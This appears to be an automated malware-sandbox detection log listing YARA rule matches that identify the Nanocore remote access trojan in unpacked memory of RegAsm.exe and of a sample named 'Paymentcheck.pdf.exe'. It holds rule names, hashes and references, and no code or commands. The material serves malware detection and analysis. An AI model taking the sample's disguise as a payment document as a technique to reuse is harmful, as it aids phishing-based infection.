Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
